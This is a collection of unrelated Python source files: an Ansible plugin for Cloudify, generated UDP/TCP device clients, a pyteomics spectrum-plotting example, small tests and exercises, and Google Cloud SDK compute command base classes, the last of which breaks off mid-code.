import shutil
# Third-party Imports
# Cloudify imports
from cloudify import ctx
from ansible_plugin import utils
from cloudify.decorators import operation
@operation
def configure(user=None, key=None, **kwargs):
agent_key_path = utils.get_keypair_path(key)
configuration = '[defaults]\n' \
'host_key_checking=False\n' \
'private_key_file={0}\n'.format(agent_key_path)
ctx.logger.info('Configuring Anisble.')
file_path = utils.write_configuration_file(configuration)
ctx.logger.info('Configured Ansible.')
os.environ['ANSIBLE_CONFIG'] = file_path
os.environ['USER'] = utils.get_agent_user(user)
os.environ['HOME'] = home = os.path.expanduser("~")
if os.path.exists(os.path.join(home, '.ansible')):
shutil.rmtree(os.path.join(home, '.ansible'))
os.makedirs(os.path.join(home, '.ansible'))
@operation
def ansible_playbook(playbooks, inventory=list(), **kwargs):
""" Runs a playbook as part of a Cloudify lifecycle operation """
inventory_path = utils.get_inventory_path(inventory)
ctx.logger.info('This is custome okan')
ctx.logger.info('Inventory path: {0}.'.format(inventory_path))
for playbook in playbooks:
playbook_path = utils.get_playbook_path(playbook)
ctx.logger.info('Playbook path: {0}.'.format(playbook_path))
user = utils.get_agent_user()
command = ['ansible-playbook',
'-i', 'localhost,', '-c', 'local', playbook_path,
'--timeout=60']
ctx.logger.info('Running command: {0}.'.format(command))
utils.run_ansible_command(command)
# ctx.logger.info('Command Output: {0}.'.format(output))
ctx.logger.info('Finished running the Ansible Playbook.')
| StarcoderdataPython |
9616405 | # coding=utf-8
# generated at 2018-10-12 21:38:39
import prometheus
import socket
import time
import gc
import prometheus.crypto
import prometheus.misc
import prometheus.psocket
import prometheus.logging as logging
gc.collect()
# region Test01UdpClient
class Test01UdpClientIntegratedLed(prometheus.Prometheus):
def __init__(self, send, recv):
prometheus.Prometheus.__init__(self)
self.send = send
self.recv = recv
@prometheus.Registry.register('Test01UdpClientIntegratedLed', 'i1')
def on(self, **kwargs):
self.send(b'i1', **kwargs)
@prometheus.Registry.register('Test01UdpClientIntegratedLed', 'i0')
def off(self, **kwargs):
self.send(b'i0', **kwargs)
@prometheus.Registry.register('Test01UdpClientIntegratedLed', 'iv', str)
def value(self, **kwargs):
self.send(b'iv', **kwargs)
return self.recv()
class Test01UdpClientLaser(prometheus.Prometheus):
def __init__(self, send, recv):
prometheus.Prometheus.__init__(self)
self.send = send
self.recv = recv
@prometheus.Registry.register('Test01UdpClientLaser', 'lv', str)
def value(self, **kwargs):
self.send(b'lv', **kwargs)
return self.recv()
@prometheus.Registry.register('Test01UdpClientLaser', 'l0')
def off(self, **kwargs):
self.send(b'l0', **kwargs)
@prometheus.Registry.register('Test01UdpClientLaser', 'l1')
def on(self, **kwargs):
self.send(b'l1', **kwargs)
class Test01UdpClientJoysticky(prometheus.Prometheus):
def __init__(self, send, recv):
prometheus.Prometheus.__init__(self)
self.send = send
self.recv = recv
@prometheus.Registry.register('Test01UdpClientJoysticky', 'yr', str)
def read(self, **kwargs):
self.send(b'yr', **kwargs)
return self.recv()
class Test01UdpClientJoystickx(prometheus.Prometheus):
def __init__(self, send, recv):
prometheus.Prometheus.__init__(self)
self.send = send
self.recv = recv
@prometheus.Registry.register('Test01UdpClientJoystickx', 'xr', str)
def read(self, **kwargs):
self.send(b'xr', **kwargs)
return self.recv()
class Test01UdpClientSwitch(prometheus.Prometheus):
def __init__(self, send, recv):
prometheus.Prometheus.__init__(self)
self.send = send
self.recv = recv
@prometheus.Registry.register('Test01UdpClientSwitch', 'sv', str)
def value(self, **kwargs):
self.send(b'sv', **kwargs)
return self.recv()
class Test01UdpClientJoystickswitch(prometheus.Prometheus):
def __init__(self, send, recv):
prometheus.Prometheus.__init__(self)
self.send = send
self.recv = recv
@prometheus.Registry.register('Test01UdpClientJoystickswitch', 'jv', str)
def value(self, **kwargs):
self.send(b'jv', **kwargs)
return self.recv()
class Test01UdpClientWindow01digital(prometheus.Prometheus):
def __init__(self, send, recv):
prometheus.Prometheus.__init__(self)
self.send = send
self.recv = recv
@prometheus.Registry.register('Test01UdpClientWindow01digital', 'w1v', str)
def value(self, **kwargs):
self.send(b'w1v', **kwargs)
return self.recv()
class Test01UdpClientWindow02digital(prometheus.Prometheus):
def __init__(self, send, recv):
prometheus.Prometheus.__init__(self)
self.send = send
self.recv = recv
@prometheus.Registry.register('Test01UdpClientWindow02digital', 'w2v', str)
def value(self, **kwargs):
self.send(b'w2v', **kwargs)
return self.recv()
class Test01UdpClient(prometheus.misc.RemoteTemplate):
def __init__(self, remote_host, remote_port=9195, bind_host='', bind_port=9195):
prometheus.misc.RemoteTemplate.__init__(self)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.bind((bind_host, bind_port))
logging.info('listening on %s:%d' % (bind_host, bind_port))
self.socket.settimeout(0)
self.remote_addr = (remote_host, remote_port)
self.buffers = dict()
self.splitChars = b'\n'
self.endChars = b'\r'
self.integrated_led = Test01UdpClientIntegratedLed(self.send, self.recv)
self.register(integrated_led=self.integrated_led)
self.joystickswitch = Test01UdpClientJoystickswitch(self.send, self.recv)
self.register(joystickswitch=self.joystickswitch)
self.joystickx = Test01UdpClientJoystickx(self.send, self.recv)
self.register(joystickx=self.joystickx)
self.joysticky = Test01UdpClientJoysticky(self.send, self.recv)
self.register(joysticky=self.joysticky)
self.laser = Test01UdpClientLaser(self.send, self.recv)
self.register(laser=self.laser)
self.switch = Test01UdpClientSwitch(self.send, self.recv)
self.register(switch=self.switch)
self.window01digital = Test01UdpClientWindow01digital(self.send, self.recv)
self.register(window01digital=self.window01digital)
self.window02digital = Test01UdpClientWindow02digital(self.send, self.recv)
self.register(window02digital=self.window02digital)
def send(self, data, **kwargs):
if len(kwargs) is 0:
args = b''
else:
args = prometheus.args_to_bytes(kwargs)
self.socket.sendto(data + self.endChars + args + self.splitChars, self.remote_addr)
def try_recv(self, buffersize):
try:
return self.socket.recvfrom(buffersize) # data, addr
except prometheus.psocket.socket_error:
return None, None
def recv_once(self, buffersize=10):
data, addr = self.try_recv(buffersize)
if data is None:
return None
if addr not in self.buffers:
self.buffers[addr] = prometheus.Buffer(split_chars=self.splitChars, end_chars=self.endChars)
self.buffers[addr].parse(data)
bufferpacket = self.buffers[addr].pop()
if bufferpacket is None:
return None
return bufferpacket.packet
def recv(self, buffersize=20):
return self.recv_timeout(buffersize, 0.5)
def recv_timeout(self, buffersize, timeout):
"""
:param buffersize: int
:param timeout: float
:return: str
"""
timestamp = time.time()
while (time.time() - timestamp) < timeout:
data = self.recv_once(buffersize)
if data is not None:
return data
return None
# endregion
# region Test01TcpClient
class Test01TcpClientIntegratedLed(prometheus.Prometheus):
def __init__(self, send, recv):
prometheus.Prometheus.__init__(self)
self.send = send
self.recv = recv
@prometheus.Registry.register('Test01TcpClientIntegratedLed', 'i1')
def on(self, **kwargs):
self.send(b'i1', **kwargs)
@prometheus.Registry.register('Test01TcpClientIntegratedLed', 'i0')
def off(self, **kwargs):
self.send(b'i0', **kwargs)
@prometheus.Registry.register('Test01TcpClientIntegratedLed', 'iv', str)
def value(self, **kwargs):
self.send(b'iv', **kwargs)
return self.recv()
class Test01TcpClientLaser(prometheus.Prometheus):
def __init__(self, send, recv):
prometheus.Prometheus.__init__(self)
self.send = send
self.recv = recv
@prometheus.Registry.register('Test01TcpClientLaser', 'lv', str)
def value(self, **kwargs):
self.send(b'lv', **kwargs)
return self.recv()
@prometheus.Registry.register('Test01TcpClientLaser', 'l0')
def off(self, **kwargs):
self.send(b'l0', **kwargs)
@prometheus.Registry.register('Test01TcpClientLaser', 'l1')
def on(self, **kwargs):
self.send(b'l1', **kwargs)
class Test01TcpClientJoysticky(prometheus.Prometheus):
def __init__(self, send, recv):
prometheus.Prometheus.__init__(self)
self.send = send
self.recv = recv
@prometheus.Registry.register('Test01TcpClientJoysticky', 'yr', str)
def read(self, **kwargs):
self.send(b'yr', **kwargs)
return self.recv()
class Test01TcpClientJoystickx(prometheus.Prometheus):
def __init__(self, send, recv):
prometheus.Prometheus.__init__(self)
self.send = send
self.recv = recv
@prometheus.Registry.register('Test01TcpClientJoystickx', 'xr', str)
def read(self, **kwargs):
self.send(b'xr', **kwargs)
return self.recv()
class Test01TcpClientSwitch(prometheus.Prometheus):
def __init__(self, send, recv):
prometheus.Prometheus.__init__(self)
self.send = send
self.recv = recv
@prometheus.Registry.register('Test01TcpClientSwitch', 'sv', str)
def value(self, **kwargs):
self.send(b'sv', **kwargs)
return self.recv()
class Test01TcpClientJoystickswitch(prometheus.Prometheus):
def __init__(self, send, recv):
prometheus.Prometheus.__init__(self)
self.send = send
self.recv = recv
@prometheus.Registry.register('Test01TcpClientJoystickswitch', 'jv', str)
def value(self, **kwargs):
self.send(b'jv', **kwargs)
return self.recv()
class Test01TcpClientWindow01digital(prometheus.Prometheus):
def __init__(self, send, recv):
prometheus.Prometheus.__init__(self)
self.send = send
self.recv = recv
@prometheus.Registry.register('Test01TcpClientWindow01digital', 'w1v', str)
def value(self, **kwargs):
self.send(b'w1v', **kwargs)
return self.recv()
class Test01TcpClientWindow02digital(prometheus.Prometheus):
def __init__(self, send, recv):
prometheus.Prometheus.__init__(self)
self.send = send
self.recv = recv
@prometheus.Registry.register('Test01TcpClientWindow02digital', 'w2v', str)
def value(self, **kwargs):
self.send(b'w2v', **kwargs)
return self.recv()
class Test01TcpClient(prometheus.misc.RemoteTemplate):
def __init__(self, remote_host, remote_port=9195, bind_host=None, bind_port=9195):
prometheus.misc.RemoteTemplate.__init__(self)
self.socket = None # type: socket.socket
self.bind_host = bind_host
self.bind_port = bind_port
self.remote_addr = (remote_host, remote_port)
self.buffers = dict()
self.split_chars = b'\n'
self.end_chars = b'\r'
self.integrated_led = Test01TcpClientIntegratedLed(self.send, self.recv)
self.register(integrated_led=self.integrated_led)
self.joystickswitch = Test01TcpClientJoystickswitch(self.send, self.recv)
self.register(joystickswitch=self.joystickswitch)
self.joystickx = Test01TcpClientJoystickx(self.send, self.recv)
self.register(joystickx=self.joystickx)
self.joysticky = Test01TcpClientJoysticky(self.send, self.recv)
self.register(joysticky=self.joysticky)
self.laser = Test01TcpClientLaser(self.send, self.recv)
self.register(laser=self.laser)
self.switch = Test01TcpClientSwitch(self.send, self.recv)
self.register(switch=self.switch)
self.window01digital = Test01TcpClientWindow01digital(self.send, self.recv)
self.register(window01digital=self.window01digital)
self.window02digital = Test01TcpClientWindow02digital(self.send, self.recv)
self.register(window02digital=self.window02digital)
def create_socket(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self.bind_host is not None:
logging.notice('bound to %s:%d' % (self.bind_host, self.bind_port))
self.socket.bind((self.bind_host, self.bind_port))
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.settimeout(5)
logging.info('Connecting to %s' % repr(self.remote_addr))
self.socket.connect(self.remote_addr)
def send_once(self, data, args):
self.socket.send(data + self.end_chars + args + self.split_chars)
def send(self, data, **kwargs):
if len(kwargs) is 0:
args = b''
else:
args = prometheus.args_to_bytes(kwargs)
if self.socket is None:
self.create_socket()
try:
self.send_once(data, args)
except prometheus.psocket.socket_error:
self.create_socket()
self.send_once(data, args)
def try_recv(self, buffersize):
try:
return self.socket.recvfrom(buffersize) # data, addr
except prometheus.psocket.socket_error:
return None, None
def recv(self, buffersize=10):
data, addr = self.try_recv(buffersize)
if data is None:
return None
if addr not in self.buffers:
self.buffers[addr] = prometheus.Buffer(split_chars=self.split_chars, end_chars=self.end_chars)
self.buffers[addr].parse(data)
bufferpacket = self.buffers[addr].pop()
if bufferpacket is None:
return None
return bufferpacket.packet
# endregion
| StarcoderdataPython |
282981 | <reponame>donnyyy777/pyteomics
from pyteomics import mgf, pepxml, mass
import os
from urllib.request import urlopen, Request
import pylab
# get the files
for fname in ('mgf', 'pep.xml'):
if not os.path.isfile('example.' + fname):
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'}
url = 'http://pyteomics.readthedocs.io/en/latest/_static/example.' + fname
request = Request(url, None, headers)
target_name = 'example.' + fname
with urlopen(request) as response, open(target_name, 'wb') as fout:
print('Downloading ' + target_name + '...')
fout.write(response.read())
def fragments(peptide, types=('b', 'y'), maxcharge=1):
"""
The function generates all possible m/z for fragments of types
`types` and of charges from 1 to `maxharge`.
"""
for i in range(1, len(peptide)-1):
for ion_type in types:
for charge in range(1, maxcharge+1):
if ion_type[0] in 'abc':
yield mass.fast_mass(
peptide[:i], ion_type=ion_type, charge=charge)
else:
yield mass.fast_mass(
peptide[i:], ion_type=ion_type, charge=charge)
with mgf.read('example.mgf') as spectra, pepxml.read('example.pep.xml') as psms:
spectrum = next(spectra)
psm = next(psms)
pylab.figure()
pylab.title('Theoretical and experimental spectra for '
+ psm['search_hit'][0]['peptide'])
pylab.xlabel('m/z, Th')
pylab.ylabel('Intensity, rel. units')
pylab.bar(spectrum['m/z array'], spectrum['intensity array'], width=0.1, linewidth=2,
edgecolor='black')
theor_spectrum = list(fragments(psm['search_hit'][0]['peptide'],
maxcharge=psm['assumed_charge']))
pylab.bar(theor_spectrum,
[spectrum['intensity array'].max()]*len(theor_spectrum),
width=0.1, edgecolor='red', alpha=0.7)
pylab.show()
| StarcoderdataPython |
6487471 | <reponame>rawat9/leetcode
class Solution:
def distance(self, point):
return point[0] ** 2 + point[1] ** 2
def kClosest(self, points: list[list[int]], k: int) -> list[list[int]]:
points.sort(key=self.distance)
return points[:k]
| StarcoderdataPython |
4818824 | from vic import lib as vic_lib
def test_make_veg_var():
assert vic_lib.make_veg_var(4) is not None
def test_make_veg_var_1snowband():
vic_lib.options.SNOW_BAND = 1
assert vic_lib.make_veg_var(4) is not None
def test_make_veg_var_5snowband():
vic_lib.options.SNOW_BAND = 5
assert vic_lib.make_veg_var(4) is not None
def test_make_veg_var_5snowbands_carbon_is_true():
vic_lib.options.SNOW_BAND = 5
vic_lib.options.CARBON = True
assert vic_lib.make_veg_var(4) is not None
| StarcoderdataPython |
6577774 | <filename>funciones_gamma.py<gh_stars>0
from matplotlib import pyplot as plt
import numpy as np
def g_gamma(x,z):
"""
Calcula la funcion que se integra de 0 a infty al calcular la funcion Gamma(z)
Params:
:param z: el valor para el que se quiere evaluar Gamma(z)
:param x: el valor sobre el que se integra (es decir, la integral es en dx)
"""
return (x**(z-1)) * np.exp(-x)
def g(u,z):
"""
Calcula la funcion que se integra de 0 a 1 al calcular la funcion Gamma(z) con el c.v. u=1/(x+1)
Params:
:param z: el valor para el que se quiere evaluar Gamma(z)
:param u: el valor sobre el que se integra (es decir, la integral es en du)
"""
return ((1/u) - 1)**(z-1) * np.exp(1 - (1/u)) * 1/(u**2)
k = 4.551
z = k/2
x = np.linspace(0, 70, num=200)
u = np.linspace(0, 1, num=200)
#figuras:
plt.clf()
plt.figure(1)
plt.plot(x, g_gamma(x,z))
plt.xlabel('x', fontsize=16)
plt.ylabel('$g_{\Gamma}(x,z)$', fontsize=16)
plt.figure(2)
plt.plot(u, g(u,z))
plt.xlabel('u', fontsize=16)
plt.ylabel('$g(u,z)$', fontsize=16)
plt.show() | StarcoderdataPython |
11333946 | from gym_adserver.envs.adserver import Ad
from gym_adserver.envs.adserver import AdServerEnv | StarcoderdataPython |
4859813 | <gh_stars>0
# Copyright 2014 Google Inc. All Rights Reserved.
"""Base classes for abstracting away common logic."""
import abc
import collections
import copy
import cStringIO
import itertools
import json
import sys
import textwrap
import protorpc.messages
import yaml
from googlecloudapis.apitools.base.py import encoding
from googlecloudapis.compute.v1 import compute_v1_messages as messages
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions as calliope_exceptions
from googlecloudsdk.compute.lib import constants
from googlecloudsdk.compute.lib import lister
from googlecloudsdk.compute.lib import metadata_utils
from googlecloudsdk.compute.lib import property_selector
from googlecloudsdk.compute.lib import request_helper
from googlecloudsdk.compute.lib import resource_specs
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core.util import console_io
from googlecloudsdk.core.util import edit
from googlecloudsdk.core.util import resource_printer
def ConstructList(title, items):
"""Returns a string displaying the items and a title."""
buf = cStringIO.StringIO()
printer = console_io.ListPrinter(title)
printer.Print(sorted(set(items)), output_stream=buf)
return buf.getvalue()
def RaiseToolException(problems, error_message=None):
"""Raises a ToolException with the given list of messages."""
tips = []
errors = []
for code, message in problems:
errors.append(message)
new_tips = constants.HTTP_ERROR_TIPS.get(code)
if new_tips:
tips.extend(new_tips)
if tips:
advice = ConstructList(
'\nhere are some tips that may help fix these problems:', tips)
else:
advice = ''
raise calliope_exceptions.ToolException(
ConstructList(
error_message or 'some requests did not succeed:',
errors) + advice)
def PrintTable(resources, table_cols):
"""Prints a table of the given resources."""
# TODO(user): Switch over to console_io.TablePrinter once the
# class is refactored to support tables without ASCII borders.
printer = resource_printer.TablePrinter(out=log.out)
header = []
for name, _ in table_cols:
header.append(name)
printer.AddRow(header)
for resource in resources:
row = []
for _, action in table_cols:
if isinstance(action, property_selector.PropertyGetter):
row.append(action.Get(resource) or '')
elif callable(action):
row.append(action(resource))
printer.AddRow(row)
printer.Print()
class BaseCommand(base.Command):
"""Base class for all compute subcommands."""
__metaclass__ = abc.ABCMeta
def __init__(self, *args, **kwargs):
super(BaseCommand, self).__init__(*args, **kwargs)
if self.print_resource_type:
# Constructing the spec can be potentially expensive (e.g.,
# generating the set of valid fields from the protobuf message),
# so we fetch it once in the constructor.
self._resource_spec = resource_specs.GetSpec(self.print_resource_type)
else:
self._resource_spec = None
@property
def transformations(self):
if self._resource_spec:
return self._resource_spec.transformations
else:
return None
# TODO(user): Change this to "resource_type". "print_resource_type"
# is now a misnomer because the resource_specs module contains
# non-presentation data as well (e.g., which fields can be edited
# for a give resource).
@property
def print_resource_type(self):
"""Specifies the name of the collection that should be printed."""
return None
class BaseResourceFetcher(BaseCommand):
"""Base class for the get and list subcommands."""
__metaclass__ = abc.ABCMeta
@staticmethod
def Args(parser, add_name_regex_arg=True):
raw_links = parser.add_argument(
'--raw-links',
action='store_true',
help=('If provided, resource references in output from the server will '
'not be condensed for readability.'))
raw_links.detailed_help = """\
If provided, resource references in output from the server
will not be condensed for readability. For example, when
listing operations, if a targetLink is
``https://www.googleapis.com/compute/v1/projects/my-project/zones/us-central2-a/instances/my-instance'',
``us-central2-a/instances/my-instance'' is shown for
brevity. This behavior can be turned off using this flag.
"""
parser.add_argument(
'--limit',
type=int,
help='The maximum number of results.')
sort_by = parser.add_argument(
'--sort-by',
help='A field to sort by.')
sort_by.detailed_help = """\
A field to sort by. To perform a descending-order sort, prefix
the value of this flag with a tilde (``~'').
"""
if add_name_regex_arg:
name_regex = parser.add_argument(
'name_regex',
nargs='*',
default=[],
help='Name regular expressions used to filter the resources fetched.')
name_regex.detailed_help = """\
Name regular expressions used to filter the resources
fetched. The regular expressions must conform to the re2
syntax (see
link:https://code.google.com/p/re2/wiki/Syntax[]).
"""
@abc.abstractmethod
def ActuallyRun(self, args):
"""Method to be implemented by subclasses.
This allows the Run() method of this class definition to do any
work common to all subclasses such as flag validation.
Args:
args: A dictionary representing command-line arguments.
"""
def Run(self, args):
if args.limit is not None:
if args.limit <= 0:
raise calliope_exceptions.ToolException(
'--limit must be a positive integer; received: {0}'
.format(args.limit))
# A really large value should be treated as if the user does not
# want to impose a limit.
if args.limit > sys.maxint:
args.limit = None
return self.ActuallyRun(args)
@abc.abstractmethod
def GetResources(self, args, errors):
"""Returns a generator of JSON-serializable resource dicts."""
class BaseLister(BaseResourceFetcher):
"""Base class for the list subcommands."""
__metaclass__ = abc.ABCMeta
@staticmethod
def Args(parser):
BaseResourceFetcher.Args(parser)
uri = parser.add_argument(
'--uri',
action='store_true',
help='If provided, a list of URIs is printed instead of a table.')
uri.detailed_help = """\
If provided, the list command will only print URIs for the
resources returned. If this flag is not provided, the list
command will print a human-readable table of useful resource
data.
"""
def ActuallyRun(self, args):
"""Yields JSON-serializable dicts of resources or self links."""
if args.uri:
field_selector = None
else:
# The field selector should be constructed before any resources
# are fetched, so if there are any syntactic errors with the
# fields, we can fail fast.
field_selector = property_selector.PropertySelector(
properties=None,
transformations=None if args.raw_links else self.transformations)
errors = []
resources = lister.ProcessResults(
resources=self.GetResources(args, errors),
field_selector=field_selector,
sort_by=args.sort_by,
limit=args.limit)
for resource in resources:
if args.uri:
yield resource['selfLink']
else:
yield resource
if errors:
RaiseToolException(errors)
def Display(self, args, resources):
"""Prints the given resources."""
if args.uri:
for resource in resources:
log.out.Print(resource)
else:
PrintTable(resources, self._resource_spec.table_cols)
def AddFieldsFlag(parser, resource_type):
"""Adds the --fields flag to the given parser.
This function is to be called from implementations of get
subcommands. The resulting help text of --fields will contain all
valid values for the flag. We need this function becasue Args() is a
static method so the only way to communicate the resource type is by
having the subclass pass it in.
Args:
parser: The parser to add --fields to.
resource_type: The resource type as defined in the resource_specs
module.
"""
def GenerateDetailedHelp():
return ('Fields to display. Possible values are:\n+\n ' +
'\n '.join(resource_specs.GetSpec(resource_type).fields))
fields = parser.add_argument(
'--fields',
nargs='+',
help='Fields to display.')
# Note that we do not actually call GenerateDetailedHelp, the help
# generator does that. This is important because getting the set of
# fields is a potentially expensive operation, so we only want to do
# it when needed.
fields.detailed_help = GenerateDetailedHelp
class BaseGetter(BaseResourceFetcher):
"""Base class for the get subcommands."""
__metaclass__ = abc.ABCMeta
@staticmethod
def Args(parser, add_name_regex_arg=True):
BaseResourceFetcher.Args(parser, add_name_regex_arg=add_name_regex_arg)
format_arg = parser.add_argument(
'--format',
choices=resource_printer.SUPPORTED_FORMATS,
default='yaml',
help='Specifies the display format.')
format_arg.detailed_help = """\
Specifies the display format. By default, resources are
printed in YAML format. The "text" and "yaml" formats print
data as they are fetched from the server, so these formats
feel more responsive. The "json" format delays printing
until all data is collected into a single list,
so it may feel less responsive.
"""
def ActuallyRun(self, args):
"""Yields JSON-serializable dicts of resources."""
# The field selector should be constructed before any resources
# are fetched, so if there are any syntactic errors with the
# fields, we can fail fast.
field_selector = property_selector.PropertySelector(
properties=args.fields,
transformations=None if args.raw_links else self.transformations)
errors = []
resources = lister.ProcessResults(
resources=self.GetResources(args, errors),
field_selector=field_selector,
sort_by=args.sort_by,
limit=args.limit)
for resource in resources:
yield resource
if errors:
RaiseToolException(errors)
def Display(self, args, resources):
"""Prints the given resources."""
resource_printer.Print(
resources=resources,
print_format=args.format,
out=log.out)
class GlobalResourceFetcherMixin(object):
"""Mixin class for global resources."""
def GetResources(self, args, errors):
return lister.GetGlobalResources(
resource_service=self.service,
project=properties.VALUES.core.project.Get(required=True),
requested_name_regexes=args.name_regex,
http=self.context['http'],
batch_url=self.context['batch-url'],
errors=errors)
class GlobalLister(GlobalResourceFetcherMixin, BaseLister):
"""Base class for listing global resources."""
class GlobalGetter(GlobalResourceFetcherMixin, BaseGetter):
"""Base class for getting global resources."""
class RegionalResourceFetcherMixin(object):
"""Mixin class for regional resources."""
def GetResources(self, args, errors):
compute = self.context['compute']
return lister.GetRegionalResources(
regions_service=compute.regions,
resource_service=self.service,
project=properties.VALUES.core.project.Get(required=True),
requested_regions=args.regions,
requested_name_regexes=args.name_regex,
http=self.context['http'],
batch_url=self.context['batch-url'],
errors=errors)
class RegionalLister(RegionalResourceFetcherMixin, BaseLister):
"""Base class for listing regional resources."""
@staticmethod
def Args(parser):
BaseLister.Args(parser)
parser.add_argument(
'--regions',
metavar='REGION',
help='If provided, only resources from the given regions are queried.',
nargs='+',
default=[])
class RegionalGetter(RegionalResourceFetcherMixin, BaseGetter):
"""Base class for getting regional resources."""
@staticmethod
def Args(parser):
BaseGetter.Args(parser)
parser.add_argument(
'--regions',
metavar='REGION',
help='If provided, only resources from the given regions are queried.',
nargs='+',
default=[])
class ZonalResourceFetcherMixin(object):
"""Mixin class for zonal resources."""
def GetResources(self, args, errors):
compute = self.context['compute']
return lister.GetZonalResources(
zones_service=compute.zones,
resource_service=self.service,
project=properties.VALUES.core.project.Get(required=True),
requested_zones=args.zones,
requested_name_regexes=args.name_regex,
http=self.context['http'],
batch_url=self.context['batch-url'],
errors=errors)
class ZonalLister(ZonalResourceFetcherMixin, BaseLister):
"""Base class for listing zonal resources."""
@staticmethod
def Args(parser):
BaseLister.Args(parser)
parser.add_argument(
'--zones',
metavar='ZONE',
help='If provided, only resources from the given zones are queried.',
nargs='+',
default=[])
class ZonalGetter(ZonalResourceFetcherMixin, BaseGetter):
"""Base class for getting zonal resources."""
@staticmethod
def Args(parser):
BaseGetter.Args(parser)
parser.add_argument(
'--zones',
metavar='ZONE',
help='If provided, only resources from the given zones are queried.',
nargs='+',
default=[])
class BaseAsyncMutator(BaseCommand):
"""Base class for subcommands that mutate resources."""
__metaclass__ = abc.ABCMeta
@abc.abstractproperty
def service(self):
"""The service that can mutate resources."""
@property
def custom_get_requests(self):
"""Returns request objects for getting the mutated resources.
This should be a dict mapping operation targetLink names to
requests that can be passed to batch_helper. This is useful for
verbs whose operations do not point to the resources being mutated
(e.g., Disks.createSnapshot).
If None, the operations' targetLinks are used to fetch the mutated
resources.
"""
return None
@abc.abstractproperty
def method(self):
"""The method name on the service as a string."""
@abc.abstractmethod
def CreateRequests(self, args):
"""Creates the requests that perform the mutation.
It is okay for this method to make calls to the API as long as the
calls originating from this method do not cause any mutations.
Args:
args: The command-line arguments.
Returns:
A list of request protobufs.
"""
def Run(self, args):
request_protobufs = self.CreateRequests(args)
requests = [
(self.service, self.method, request) for request in request_protobufs]
resources = request_helper.MakeRequests(
requests=requests,
http=self.context['http'],
batch_url=self.context['batch-url'],
custom_get_requests=self.custom_get_requests)
resources = lister.ProcessResults(
resources=resources,
field_selector=property_selector.PropertySelector(
properties=None,
transformations=self.transformations))
for resource in resources:
yield resource
def Display(self, _, resources):
"""Prints the given resources."""
# The following try/except ensures that we only call
# resource_printer.Print if there is as least one item in the
# resources generator.
try:
head = next(resources)
resources = itertools.chain([head], resources)
resource_printer.Print(
resources=resources,
print_format='yaml',
out=log.out)
except StopIteration:
pass
class BaseDeleter(BaseAsyncMutator):
"""Base class for deleting resources."""
@staticmethod
def Args(parser):
BaseAsyncMutator.Args(parser)
parser.add_argument(
'names',
metavar='NAME',
nargs='+',
help='The resources to delete.')
@abc.abstractproperty
def collection(self):
"""The name of the collection that we will delete from."""
@property
def method(self):
return 'Delete'
def ScopeRequest(self, args, request):
"""Adds a zone or region to the request object if necessary."""
def CreateRequests(self, args):
"""Returns a list of delete request protobufs."""
delete_request_class = self.service.GetRequestType(self.method)
name_field = self.service.GetMethodConfig(self.method).ordered_params[-1]
prompt_message = ConstructList(self.prompt_title, args.names)
if not console_io.PromptContinue(message=prompt_message):
raise calliope_exceptions.ToolException('deletion aborted by user')
requests = []
for name in args.names:
request = delete_request_class(project=self.context['project'])
setattr(request, name_field, name)
self.ScopeRequest(args, request)
requests.append(request)
return requests
class ZonalDeleter(BaseDeleter):
"""Base class for deleting zonal resources."""
@staticmethod
def Args(parser):
BaseDeleter.Args(parser)
parser.add_argument(
'--zone',
help='The zone of the resources to delete.',
required=True)
def ScopeRequest(self, args, request):
request.zone = args.zone
def Run(self, args):
self.prompt_title = (
'The following {0} in zone {1} will be deleted:'.format(
self.collection, args.zone))
return super(ZonalDeleter, self).Run(args)
class RegionalDeleter(BaseDeleter):
"""Base class for deleting regional resources."""
@staticmethod
def Args(parser):
BaseDeleter.Args(parser)
parser.add_argument(
'--region',
help='The region of the resources to delete.',
required=True)
def ScopeRequest(self, args, request):
request.region = args.region
def Run(self, args):
self.prompt_title = (
'The following {0} in region {1} will be deleted:'.format(
self.collection, args.region))
return super(RegionalDeleter, self).Run(args)
class GlobalDeleter(BaseDeleter):
"""Base class for deleting global resources."""
def Run(self, args):
self.prompt_title = 'The following {0} will be deleted:'.format(
self.collection)
return super(GlobalDeleter, self).Run(args)
class ReadWriteCommand(BaseCommand):
"""Base class for read->update->write subcommands."""
__metaclass__ = abc.ABCMeta
@abc.abstractproperty
def service(self):
pass
@abc.abstractmethod
def GetGetRequest(self, args):
"""Returns a request for fetching the resource."""
@abc.abstractmethod
def GetSetRequest(self, args, replacement, existing):
"""Returns a request for setting the resource."""
@abc.abstractmethod
def Modify(self, args, existing):
"""Returns a modified resource."""
@property
def messages(self):
return messages
def Run(self, args):
get_request = self.GetGetRequest(args)
objects = list(request_helper.MakeRequests(
requests=[get_request],
http=self.context['http'],
batch_url=self.context['batch-url']))
new_object = self.Modify(args, objects[0])
# If existing object is equal to the proposed object or if
# Modify() returns None, then there is no work to be done, so we
# print the resource and return.
if not new_object or objects[0] == new_object:
for resource in lister.ProcessResults(
resources=[objects[0]],
field_selector=property_selector.PropertySelector(
properties=None,
transformations=self.transformations)):
yield resource
return
resources = request_helper.MakeRequests(
requests=[self.GetSetRequest(args, new_object, objects[0])],
http=self.context['http'],
batch_url=self.context['batch-url'])
resources = lister.ProcessResults(
resources=resources,
field_selector=property_selector.PropertySelector(
properties=None,
transformations=self.transformations))
for resource in resources:
yield resource
def Display(self, _, resources):
resource_printer.Print(
resources=resources,
print_format='yaml',
out=log.out)
class ReadSetCommand(BaseCommand):
"""Base class for read->set subcommands."""
__metaclass__ = abc.ABCMeta
@abc.abstractproperty
def service(self):
pass
@abc.abstractmethod
def GetGetRequest(self, args):
"""Returns a request for fetching a resource."""
@abc.abstractmethod
def GetSetRequest(self, args, existing):
"""Returns a request for setting a resource."""
def Run(self, args):
get_request = self.GetGetRequest(args)
objects = list(request_helper.MakeRequests(
requests=[get_request],
http=self.context['http'],
batch_url=self.context['batch-url']))
set_request = self.GetSetRequest(args, objects[0])
resources = request_helper.MakeRequests(
requests=[set_request],
http=self.context['http'],
batch_url=self.context['batch-url'])
resources = lister.ProcessResults(
resources=resources,
field_selector=property_selector.PropertySelector(
properties=None,
